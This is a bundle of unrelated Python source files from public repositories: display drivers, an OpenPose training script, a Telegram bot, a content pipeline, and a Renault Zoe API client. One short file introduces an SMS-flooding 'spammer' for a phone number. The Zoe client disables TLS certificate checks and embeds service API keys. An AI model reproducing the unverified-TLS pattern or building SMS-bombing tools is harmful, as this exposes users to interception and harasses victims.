b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-12-16T18:20:55.000Z
|
2021-12-16T18:20:55.000Z
|
import base64
import os
from typing import Any, Dict, List, Tuple
from app.schemas.slide import Slide
def convert_binary_to_base64(binary_data: bytes):
"""
Converts bytes to base64
:param binary_data: Data to convert
:return: The data in base64
"""
return base64.b64encode(binary_data)
def is_byte_data(data: Any):
"""
Checks if the given data is of type byte
:param data: The data to check
:return: Whether the data is of type bytes or not
"""
return type(data) is bytes
def convert_slide_binary_metadata_to_base64(slide: Slide) -> List[Slide]:
"""
Converts all binary data contained in the slide metadata to base64
"""
if slide.metadata is not None:
for metadata_key, metadata_value in slide.metadata.items():
if is_byte_data(metadata_value):
slide.metadata[metadata_key] = convert_binary_to_base64(metadata_value)
return slide
def convert_binary_metadata_to_base64(slides: List[Slide]) -> List[Slide]:
"""
Converts all binary data contained in the slide metadata to base64
:param slides: The slides to convert the metadata from
:return: The slides without binary metadata
"""
for slide in slides:
if slide.metadata is not None:
for metadata_key, metadata_value in slide.metadata.items():
if is_byte_data(metadata_value):
slide.metadata[metadata_key] = convert_binary_to_base64(
metadata_value
)
return slides
def openslide_can_load(file_extension: str) -> bool:
"""
Checks if the given file extension can be loaded by openslide.
:param file_extension: The file extension should be checked
:return: If the file extension can be loaded by openslide or not
"""
OPENSLIDE_FORMATS = [
"svs",
"tif",
"vms",
"vmu",
"ndpi",
"scn",
"mrxs",
"tiff",
"svslide",
"bif",
]
return file_extension.lower() in OPENSLIDE_FORMATS
def get_file_name_and_file_extension(file_name_with_extension: str) -> Tuple[str, str]:
"""
Splits the extension of the file name
:param: file name with extension
:return: file name and file extension
"""
return os.path.splitext(file_name_with_extension)
def remove_truth_values_from_dict(
dict_to_be_filtered: Dict[Any, Any]
) -> Dict[Any, Any]:
"""
Removes all entries in the given dict which have 'True' as value
:param: Dict to filter
:return: Filtered dict
"""
query = {}
if dict_to_be_filtered:
for key in dict_to_be_filtered:
if not dict_to_be_filtered[key]:
query[key] = dict_to_be_filtered[key]
return query
def delete_keys_from_dict(dict_del: Dict, keys_to_delete: List[str]) -> Dict:
"""
Delets the given keys from the given dict
:param dict_del: dict to delete keys from
:param keys_to_delete: All Keys that should be deleted
:return: The dict without the deleted keys
"""
for k in keys_to_delete:
try:
del dict_del[k]
except KeyError:
pass
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, keys_to_delete)
return dict_del
| 28.121951 | 88 | 0.625903 |
3a8dccd4067fa93ab125ce3063cd8685da4e8522
| 252 |
py
|
Python
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 2,706 |
2018-04-05T18:28:50.000Z
|
2022-03-29T16:56:59.000Z
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 242 |
2018-04-05T22:30:42.000Z
|
2022-03-19T01:55:11.000Z
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 464 |
2018-04-05T19:10:34.000Z
|
2022-03-28T13:33:32.000Z
|
def dictMerge(a, b):
for key, value in b.items():
if isinstance(value, dict):
if key in a:
dictMerge(a[key], value)
else:
a[key] = dict(value)
else:
a[key] = value
| 25.2 | 40 | 0.436508 |
c95e36268fee4f635fdeff040e5f9871c8981a24
| 5,090 |
py
|
Python
|
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
from micropython import const
from pyb import UART
import utime
import register
LCD_COM_SPEED = const(921600)
LCD_COM_PORT = const(3)
class LCDCommand:
class Page:
Buffer = str()
Backup = str()
Repeat = False
Headline = "P."
Entry = "1" #Page 0_1
Main = "2" #Page_1
Bye = "3" #Page_Bye
Alarm = "4" #Page_Alarm
def ClearBuffer(self):
self.Backup = str()
class Ignition:
Buffer = str()
Backup = str()
Repeat = False
Headline = "I."
On = "1" #Ignition_On
Off = "2" #Ignition_Off
def ClearBuffer(self):
self.Backup = str()
class Seat:
NumberOfSeats = register.MAX_SEAT_NUMBER
Buffer = [str()] * NumberOfSeats
Backup = [str()] * NumberOfSeats
Repeat = False
Headline = "S."
Saved = "1" #Seat_Ok
Unregistered = "2" #Seat_Unregistered
Registered = "3" #Seat_Registered
Full = "4" #Seat_Red
FullWithSeatBeltAttached = "5" #Seat_Green
BlankWithSeatBeltAttached = "6" #Seat_Yellow
PadError = "7" #Seat_Fault
HubError = "8" #Seat_Fault
PadShortCircuit = "9" #Seat_Fault
def ClearBuffer(self):
self.Backup = [str()] * self.NumberOfSeats
class Counters:
Buffer = str()
Backup = str()
Repeat = False
Headline = "C."
Default = 1 #C0-25
def ClearBuffer(self):
self.Backup = str()
class Record:
Buffer = str()
Backup = str()
Repeat = False
Headline = "R."
Default = "1" #Mode_Null
RecordMode = "2" #Mode_Record
Services = "3" #Mode_Service
def ClearBuffer(self):
self.Backup = str()
class Instructions:
Buffer = str()
Backup = str()
Repeat = False
Headline = "L."
Sleep = "0"
WakeUp = "1"
def ClearBuffer(self):
self.Backup = str()
def ClearAllBuffer(self):
LCDCommand.Page.ClearBuffer(LCDCommand.Page)
LCDCommand.Ignition.ClearBuffer(LCDCommand.Ignition)
LCDCommand.Seat.ClearBuffer(LCDCommand.Seat)
LCDCommand.Counters.ClearBuffer(LCDCommand.Counters)
LCDCommand.Record.ClearBuffer(LCDCommand.Record)
class Display():
def __init__(self):
super().__init__()
self.Setup()
def Setup(self):
self.UART = UART(LCD_COM_PORT, LCD_COM_SPEED)
def Process(self):
self.Instructions()
self.Page()
self.Ignition()
self.Seat()
self.Counters()
self.Record()
def Instructions(self):
if (LCDCommand.Instructions.Buffer != LCDCommand.Instructions.Backup) or LCDCommand.Instructions.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Instructions.Headline, LCDCommand.Instructions.Buffer))
LCDCommand.Instructions.Backup = LCDCommand.Instructions.Buffer
def Page(self):
if (LCDCommand.Page.Buffer != LCDCommand.Page.Backup) or LCDCommand.Page.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Page.Headline, LCDCommand.Page.Buffer))
LCDCommand.Page.Backup = LCDCommand.Page.Buffer
def Ignition(self):
if (LCDCommand.Ignition.Buffer != LCDCommand.Ignition.Backup) or LCDCommand.Ignition.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Ignition.Headline, LCDCommand.Ignition.Buffer))
LCDCommand.Ignition.Backup = LCDCommand.Ignition.Buffer
def Seat(self):
for i in range(LCDCommand.Seat.NumberOfSeats):
if (LCDCommand.Seat.Buffer[i] != LCDCommand.Seat.Backup[i]) or LCDCommand.Seat.Repeat:
self.SendCommand("{}{}.{}".format(LCDCommand.Seat.Headline, i, LCDCommand.Seat.Buffer[i]))
LCDCommand.Seat.Backup[i] = LCDCommand.Seat.Buffer[i]
def Counters(self):
if (LCDCommand.Counters.Buffer != LCDCommand.Counters.Backup) or LCDCommand.Counters.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Counters.Headline, LCDCommand.Counters.Buffer))
LCDCommand.Counters.Backup = LCDCommand.Counters.Buffer
def Record(self):
if (LCDCommand.Record.Buffer != LCDCommand.Record.Backup) or LCDCommand.Record.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Record.Headline, LCDCommand.Record.Buffer))
LCDCommand.Record.Backup = LCDCommand.Record.Buffer
def SendCommand(self, buf=""):
try:
self.UART.write(buf)
self.NextionEndCommand()
except OSError as err:
print("OS error: {0}".format(err))
except ValueError:
print("Could not send data over UART.")
except:
print("Unexpected error!")
raise
def NextionEndCommand(self):
self.UART.write(b'\xff')
| 32.83871 | 112 | 0.582122 |
2821431eafdeea45b18a5b97332139b738202dbe
| 895 |
py
|
Python
|
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | null | null | null |
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | 1 |
2022-03-02T10:43:58.000Z
|
2022-03-02T10:43:58.000Z
|
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | null | null | null |
# Updated from:
# git clone https://github.com/pimoroni/speaker-phat.git
# speaker-phat/python/speakerphat.py
import atexit
from sys import exit
try:
import sn3218
except ImportError:
exit("This library requires the sn3218 module\nInstall with: sudo pip install sn3218")
stupid_led_mappings = [0, 1, 2, 4, 6, 8, 10, 12, 14, 16]
led_values = [0 for x in range(18)]
enable_leds = 0
WIDTH = 10
HEIGHT = 1
for x in stupid_led_mappings:
enable_leds |= 1 << x
sn3218.enable_leds(enable_leds)
sn3218.enable()
def clear():
global led_values
led_values = [0 for x in range(18)]
show()
def set_led(index, value):
led_values[stupid_led_mappings[index]] = value
def set_leds(values):
for index in range(len(values)):
set_led(index, values[index])
def show():
sn3218.output(led_values)
atexit.register(clear)
| 20.340909 | 91 | 0.670391 |
282d111aa47b111e35f16fa964919249981c16d2
| 10,270 |
py
|
Python
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import os
import argparse
import glob
from ast import literal_eval as liter
from mindspore import Tensor
from mindspore import context
from mindspore import export
from mindspore.common import set_seed
from mindspore.context import ParallelMode
from mindspore.communication.management import init
from mindspore.train import Model
from mindspore.train.callback import ModelCheckpoint, CheckpointConfig, TimeMonitor
from mindspore.nn.optim import Adam, Momentum
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from src.dataset import create_dataset
from src.openposenet import OpenPoseNet
from src.loss import openpose_loss, BuildTrainNetwork, TrainOneStepWithClipGradientCell
from src.utils import get_lr, MyLossMonitor
from src.model_utils.config import config
from src.model_utils.device_adapter import get_rank_id, get_device_num
import moxing as mox
import numpy as np
parser = argparse.ArgumentParser(description='Object detection')
parser.add_argument('--data_url',
metavar='DIR',
default='/cache/data_url',
help='path to dataset')
parser.add_argument('--train_url',
default="/cache/output/",
type=str,
help="setting dir of training output")
parser.add_argument('--vgg_path',
default="",
type=str,
help="vgg path")
parser.add_argument('--imgpath_train',
default="imgpath/train2017",
type=str,
help="image path")
parser.add_argument('--jsonpath_train',
default="jsonpath/person_keypoints_train2017.json",
type=str,
help="json path")
parser.add_argument('--maskpath_train',
default="maskpath/ignore_train2017",
type=str,
help="mask path")
parser.add_argument('--max_epoch_train',
default="2",
type=int,
help="max_epoch_train")
parser.add_argument('--warmup_epoch',
default="1",
type=int,
help="warmup_epoch")
parser.add_argument('--batch_size',
default="128",
type=int,
help="batch_size")
args_opt = parser.parse_args()
set_seed(1)
def frozen_to_air(net_f, args):
param_dict = load_checkpoint(args.get("ckpt_file"))
load_param_into_net(net_f, param_dict)
input_arr = Tensor(np.zeros([args.get("batch_size"), 3, args.get("height"), args.get("width")], np.float32))
export(net, input_arr, file_name=args.get("file_name"), file_format=args.get("file_format"))
if __name__ == "__main__":
if not os.path.exists(config.data_path):
os.makedirs(config.data_path, exist_ok=True)
if not os.path.exists(config.output_path):
os.makedirs(config.output_path, exist_ok=True)
mox.file.copy_parallel(args_opt.data_url, config.data_path)
config.imgpath_train = os.path.join("/cache/data/", args_opt.imgpath_train)
config.jsonpath_train = os.path.join("/cache/data/", args_opt.jsonpath_train)
config.maskpath_train = os.path.join("/cache/data/", args_opt.maskpath_train)
config.max_epoch_train = args_opt.max_epoch_train
config.warmup_epoch = args_opt.warmup_epoch
config.batch_size = args_opt.batch_size
if args_opt.vgg_path:
config.vgg_path = os.path.join("/cache/data/", args_opt.vgg_path)
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
config.lr = liter(config.lr)
config.outputs_dir = config.save_model_path
device_num = get_device_num()
if device_num > 1:
init()
context.set_auto_parallel_context(device_num=device_num, parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
config.rank = get_rank_id()
config.outputs_dir = os.path.join(config.outputs_dir, "ckpt_{}/".format(config.rank))
else:
config.outputs_dir = os.path.join(config.outputs_dir, "ckpt_0/")
config.rank = 0
if device_num > 1:
config.max_epoch = config.max_epoch_train_NP
config.loss_scale = config.loss_scale / 2
config.lr_steps = list(map(int, config.lr_steps_NP.split(',')))
config.train_type = config.train_type_NP
config.optimizer = config.optimizer_NP
config.group_params = config.group_params_NP
else:
config.max_epoch = config.max_epoch_train
config.loss_scale = config.loss_scale
config.lr_steps = list(map(int, config.lr_steps.split(',')))
# create network
print('start create network')
criterion = openpose_loss()
criterion.add_flags_recursive(fp32=True)
network = OpenPoseNet(vggpath=config.vgg_path)
train_net = BuildTrainNetwork(network, criterion)
# create dataset
if os.path.exists(config.jsonpath_train) and os.path.exists(config.imgpath_train) \
and os.path.exists(config.maskpath_train):
print('start create dataset')
else:
raise ValueError('Error: wrong data path.')
num_worker = 20 if device_num > 1 else 48
de_dataset_train = create_dataset(config.jsonpath_train, config.imgpath_train, config.maskpath_train,
batch_size=config.batch_size,
rank=config.rank,
group_size=device_num,
num_worker=num_worker,
multiprocessing=True,
shuffle=True,
repeat_num=1)
steps_per_epoch = de_dataset_train.get_dataset_size()
print("steps_per_epoch: ", steps_per_epoch)
# lr scheduler
lr_stage, lr_base, lr_vgg = get_lr(config.lr * device_num,
config.lr_gamma,
steps_per_epoch,
config.max_epoch,
config.lr_steps,
device_num,
lr_type=config.lr_type,
warmup_epoch=config.warmup_epoch)
# optimizer
if config.group_params:
vgg19_base_params = list(filter(lambda x: 'base.vgg_base' in x.name, train_net.trainable_params()))
base_params = list(filter(lambda x: 'base.conv' in x.name, train_net.trainable_params()))
stages_params = list(filter(lambda x: 'base' not in x.name, train_net.trainable_params()))
group_params = [{'params': vgg19_base_params, 'lr': lr_vgg},
{'params': base_params, 'lr': lr_base},
{'params': stages_params, 'lr': lr_stage}]
if config.optimizer == "Momentum":
opt = Momentum(group_params, learning_rate=lr_stage, momentum=0.9)
elif config.optimizer == "Adam":
opt = Adam(group_params)
else:
raise ValueError("optimizer not support.")
else:
if config.optimizer == "Momentum":
opt = Momentum(train_net.trainable_params(), learning_rate=lr_stage, momentum=0.9)
elif config.optimizer == "Adam":
opt = Adam(train_net.trainable_params(), learning_rate=lr_stage)
else:
raise ValueError("optimizer not support.")
# callback
config_ck = CheckpointConfig(save_checkpoint_steps=config.ckpt_interval,
keep_checkpoint_max=config.keep_checkpoint_max)
ckpoint_cb = ModelCheckpoint(prefix=f"openpose-train-rank{config.rank}", directory=config.outputs_dir,
config=config_ck)
time_cb = TimeMonitor(data_size=de_dataset_train.get_dataset_size())
if config.rank == 0:
callback_list = [MyLossMonitor(), time_cb, ckpoint_cb]
else:
callback_list = [MyLossMonitor(), time_cb]
# train
if config.train_type == 'clip_grad':
train_net = TrainOneStepWithClipGradientCell(train_net, opt, sens=config.loss_scale)
train_net.set_train()
model = Model(train_net)
elif config.train_type == 'fix_loss_scale':
loss_scale_manager = FixedLossScaleManager(config.loss_scale, drop_overflow_update=False)
train_net.set_train()
model = Model(train_net, optimizer=opt, loss_scale_manager=loss_scale_manager)
else:
raise ValueError("Type {} is not support.".format(config.train_type))
print("============== Starting Training ==============")
model.train(config.max_epoch, de_dataset_train, callbacks=callback_list,
dataset_sink_mode=False)
ckpt_list = glob.glob(config.outputs_dir + "/openpose*.ckpt")
if not ckpt_list:
print("ckpt file not generated.")
ckpt_list.sort(key=os.path.getmtime)
ckpt_model = ckpt_list[-1]
print("checkpoint path", ckpt_model)
net = OpenPoseNet(vggpath=config.vgg_path)
frozen_to_air_args = {'ckpt_file': ckpt_model,
'batch_size': 1,
'height': 368,
'width': 368,
'file_name': config.outputs_dir + '/openpose',
'file_format': 'AIR'}
frozen_to_air(net, frozen_to_air_args)
mox.file.copy_parallel(config.outputs_dir, args_opt.train_url)
| 42.970711 | 112 | 0.630088 |
25181fdb9f6efc5700c1cd156c8eb548c49cdefe
| 209 |
py
|
Python
|
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | 1 |
2020-01-16T08:40:00.000Z
|
2020-01-16T08:40:00.000Z
|
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | null | null | null |
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | 1 |
2019-10-16T08:11:51.000Z
|
2019-10-16T08:11:51.000Z
|
from samt import Bot
bot = Bot()
@bot.answer("Hello")
@bot.answer("/start")
@bot.answer("Hallo")
def start():
return "Hello, new user, how can I help you?"
if __name__ == "__main__":
bot.listen()
| 13.933333 | 49 | 0.631579 |
c29e708e86c49f9855aad0a25240296cc438dadc
| 313 |
py
|
Python
|
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
# - Spammer v1
# | Description: spams a phone number by sending it a lot of sms by using Grab API
# | Author: P4kL0nc4t
# | Date: 5/12/2017
# | Disclaimer: Editing author will not make you the real coder
import spammer_class
spammer = spammer_class.Spammer()
spammer.author = "P4kL0nc4t"
spammer.main()
| 31.3 | 83 | 0.71885 |
6c3d2d29a6ac823d883558f4bb30a9c51f532846
| 6,903 |
py
|
Python
|
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | 3 |
2020-06-27T08:19:35.000Z
|
2020-12-27T17:46:02.000Z
|
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | null | null | null |
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | null | null | null |
import glob
import logging.config
import os
from enum import Enum
from django.conf import settings
from oldp.apps.backend.processing import ProcessingError
from oldp.apps.backend.processing.processing_steps import BaseProcessingStep
ContentStorage = Enum('ContentStorage', 'ES FS DB')
logger = logging.getLogger(__name__)
class InputHandler(object):
input_selector = None # Can be single, list, ... depends on get_content
input_limit = 0 # 0 = unlimited
input_start = 0
pre_processed_content = []
def __init__(self, limit=0, start=0, selector=None):
self.input_limit = limit
self.input_selector = selector
self.input_start = start
def handle_input(self, input_content) -> None:
raise NotImplementedError()
def get_input(self) -> list:
raise NotImplementedError()
class InputHandlerFS(InputHandler):
"""Read content files for initial processing from file system"""
dir_selector = '/*'
def get_input_content_from_selector(self, selector) -> list:
content = []
if isinstance(selector, str):
if os.path.isdir(selector):
# Get all files recursive
content.extend(sorted(file for file in glob.glob(selector + self.dir_selector, recursive=True)))
elif os.path.isfile(selector):
# Selector is specific file
content.append(selector)
elif isinstance(selector, list):
# List of selectors
for s in selector:
content.extend(self.get_input_content_from_selector(s))
return content
def get_input(self) -> list:
"""Select files from input_selector recursively and from directory with dir_selector """
if self.input_selector is None:
raise ProcessingError('input_selector is not set')
content_list = self.get_input_content_from_selector(self.input_selector)[self.input_start:]
if len(content_list) < 1:
raise ProcessingError('Input selector is empty: %s' % self.input_selector)
if self.input_limit > 0:
content_list = content_list[:self.input_limit]
return content_list
def handle_input(self, input_content: str) -> None:
raise NotImplementedError()
class ContentProcessor(object):
"""Base class for content processing pipeline
Methods are called in the following order:
1. get_input: returns list of input objects (fs: file path, db: model instance)
- fs: set_input: list of dirs or files
- db: set_input: db.queryset
2. handle_input: handles input objects and transforms them to processing objects (fs: file path > model instance
+ save instance, db: keep model instance); write to self.pre_processed_content
3. process: iterate over all processing steps (model instance > model instance), save processed model (in db
+ self.processed_content)
4. post_process: iterate over all post processing steps (e.g. write to ES)
"""
working_dir = os.path.join(settings.BASE_DIR, 'workingdir')
input_handler = None # type: InputHandler
processed_content = []
pre_processed_content = []
processing_steps = []
post_processing_steps = []
# Errors
pre_processing_errors = []
post_processing_errors = []
processing_errors = []
# Storage
# output_path = 'http://localhost:9200'
# DB settings (Django db models to be deleted on setup)
# db_models = []
# Stats
file_counter = 0
file_failed_counter = 0
doc_counter = 0
doc_failed_counter = 0
def __init__(self):
# Working dir
pass
@staticmethod
def set_parser_arguments(parser):
# Enable arguments that are used by all children
parser.add_argument('--verbose', action='store_true', default=False)
def set_options(self, options):
# Set options according to parser options
# self.output_path = options['output']
if options['verbose']:
logger.setLevel(logging.DEBUG)
def empty_content(self):
raise NotImplementedError()
def set_input_handler(self, handler: InputHandler):
self.input_handler = handler
def call_processing_steps(self, content):
for step in self.processing_steps: # type: BaseProcessingStep
try:
content = step.process(content)
except ProcessingError as e:
logger.error('Failed to call processing step (%s): %s' % (step, e))
self.processing_errors.append(e)
return content
def process(self):
# Reset queues
self.pre_processed_content = []
self.processed_content = []
# Separate input handling and processing (processing needs to access previous items)
for input_content in self.input_handler.get_input():
try:
self.input_handler.handle_input(input_content)
except ProcessingError as e:
logger.error('Failed to process content (%s): %s' % (input_content, e))
self.pre_processing_errors.append(e)
self.pre_processed_content = self.input_handler.pre_processed_content
logger.debug('Pre-processed content: %i' % len(self.pre_processed_content))
self.process_content()
# Call post processing steps (each with whole content queue)
for step in self.post_processing_steps:
try:
step.process(self.processed_content)
except ProcessingError as e:
logger.error('Failed to call post processing step (%s): %s' % (step, e))
self.post_processing_errors.append(e)
def process_content(self):
raise NotImplementedError("Child class instead to implement this method.")
def log_stats(self):
logger.info('Processing stats:')
logger.info('- Successful files: %i (failed: %i)' % (self.file_counter, self.file_failed_counter))
logger.info('- Successful documents: %i (failed: %i)' % (self.doc_counter, self.doc_failed_counter))
for step in self.post_processing_steps:
if hasattr(step, 'log_stats'):
step.log_stats()
if len(self.pre_processing_errors) > 0:
logger.warning('Pre-processing errors: %i' % len(self.pre_processing_errors))
logger.debug('Pre-processing errors: %s' % self.pre_processing_errors)
if len(self.processing_errors) > 0:
logger.warning('Processing errors: %i' % len(self.processing_errors))
logger.debug('Processing errors: %s' % self.processing_errors)
if len(self.post_processing_errors) > 0:
logger.warning('Post-processing errors: %i' % len(self.post_processing_errors))
logger.debug('Post-processing errors: %s' % self.post_processing_errors)
| 34.343284 | 116 | 0.656961 |
dd9003ab0ee5a1422ecb9328b37e45da2d4620c7
| 25,679 |
py
|
Python
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | 1 |
2021-01-01T09:12:12.000Z
|
2021-01-01T09:12:12.000Z
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | 4 |
2020-12-23T23:04:09.000Z
|
2022-03-16T21:21:38.000Z
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | null | null | null |
# coding: UTF-8
import unittest
import time
# functional import
import urllib
import urllib2
import ssl
import threading
from datetime import datetime
import json
#########################################################
class hsl20_4:
LOGGING_NONE = 0
def __init__(self):
pass
class BaseModule:
debug_output_value = {} # type: float
debug_set_remanent = {} # type: float
debug_input_value = {}
def __init__(self, a, b):
pass
def _get_framework(self):
f = hsl20_4.Framework()
return f
def _get_logger(self, a, b):
return 0
def _get_remanent(self, key):
return 0
def _set_remanent(self, key, val):
self.debug_set_remanent = val
def _set_output_value(self, pin, value):
self.debug_output_value[int(pin)] = value
print "# Out: " + str(value) + " @ pin " + str(pin)
def _get_input_value(self, pin):
if pin in self.debug_input_value:
return self.debug_input_value[pin]
else:
return 0
class Framework:
def __init__(self):
pass
def _run_in_context_thread(self, a):
pass
def create_debug_section(self):
d = hsl20_4.DebugHelper()
return d
class DebugHelper:
def __init__(self):
pass
def set_value(self, cap, text):
print("DEBUG value\t'" + str(cap) + "': " + str(text))
def add_message(self, msg):
print("Debug Msg\t" + str(msg))
def add_exception(self, msg):
print("EXCEPTION Msg\t" + str(msg))
#########################################################
##!!!!##################################################################################################
#### Own written code can be placed above this commentblock . Do not change or delete commentblock! ####
########################################################################################################
##** Code created by generator - DO NOT CHANGE! **##
class Zoe_14106_14106(hsl20_4.BaseModule):
def __init__(self, homeserver_context):
hsl20_4.BaseModule.__init__(self, homeserver_context, "14106_Zoe")
self.FRAMEWORK = self._get_framework()
self.LOGGER = self._get_logger(hsl20_4.LOGGING_NONE,())
self.PIN_I_S_USER=1
self.PIN_I_S_PW=2
self.PIN_I_S_VIN=3
self.PIN_I_N_ZOEMODEL=4
self.PIN_I_N_INTERVAL=5
self.PIN_I_N_TRIGGER=6
self.PIN_I_N_AC=7
self.PIN_I_N_CHARGE=8
self.PIN_O_S_CARPICTURE=1
self.PIN_O_N_BATTERYLEVEL=2
self.PIN_O_N_BATTERYAUTONOMY=3
self.PIN_O_N_BATTERYAVAILABLEENERGY=4
self.PIN_O_N_BATTERYTEMPERATURE=5
self.PIN_O_N_PLUGSTATUS=6
self.PIN_O_N_CHARGESTATUS=7
self.PIN_O_N_TOTALMILEAGE=8
self.PIN_O_N_GPSLATITUDE=9
self.PIN_O_N_GPSLONGITUDE=10
self.PIN_O_S_LASTUPDATETIME=11
self.PIN_O_N_ACFEEDBACK=12
########################################################################################################
#### Own written code can be placed after this commentblock . Do not change or delete commentblock! ####
###################################################################################################!!!##
# do not edit
g_kamareonURL = "https://api-wired-prod-1-euw1.wrd-aws.com" # type: str
g_kamareonAPI = "Ae9FDWugRxZQAGm3Sxgk7uJn6Q4CGEA2" # type: str
g_gigyaURL = "https://accounts.eu1.gigya.com" # type: str
g_gigyaAPI = "3_7PLksOyBRkHv126x5WhHb-5pqC1qFR8pQjxSeLB6nhAnPERTUlwnYoznHSxwX668" # type: str
# austria: "3__B4KghyeUb0GlpU62ZXKrjSfb7CPzwBS368wioftJUL5qXE0Z_sSy0rX69klXuHy"
g_keychain = {}
g_error = False
def clear_keychain(self):
self.g_keychain = {}
def get_date(self):
now = datetime.now()
timenow = now.strftime("%Y%m%d-%H") # shall: "20201028-14" (14 = hour)
return timenow
def check_time(self):
if 'lastJWTCall' in self.g_keychain:
if self.g_keychain["lastJWTCall"] == self.get_date():
return True
self.clear_keychain()
return False
def get_https_response(self, p_url, p_path, p_headers="", p_data=""):
url = p_url + p_path
resp = {"data": "", "code": 418}
# Build a SSL Context to disable certificate verification.
ctx = ssl._create_unverified_context()
if p_headers == "":
request = urllib2.Request(url)
elif p_headers != "" and p_data == "":
request = urllib2.Request(url, headers=p_headers)
else:
request = urllib2.Request(url, data=p_data, headers=p_headers)
# Open the URL and read the response.
response = urllib2.urlopen(request, timeout=3, context=ctx)
resp = {"data": response.read(), "code": response.getcode()}
if resp["code"] != 200:
self.DEBUG.add_message("Http status code " + str(resp["code"]) + " while accessing " + response.url())
return resp
def get_status(self, endpoint, version, kamareonURL, account_id, VIN, gigyaJWTToken, kamareonAPI):
# fetch data from kamereon (single vehicle)
path = '/commerce/v1/accounts/' + account_id + '/kamereon/kca/car-adapter/v' + str(
version) + '/cars/' + VIN + '/' + endpoint + '?country=DE'
headers = {"x-gigya-id_token": gigyaJWTToken, "apikey": kamareonAPI, "Content-type": "application/vnd.api+json"}
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
status_code = api_result["code"]
api_result = api_result["data"]
print("x. " + endpoint + " status: " + str(status_code))
if status_code == 200:
try:
api_result = json.loads(api_result)
except Exception as e:
self.DEBUG.add_exception("Error get_status: " + str(e))
return api_result
else:
return {}
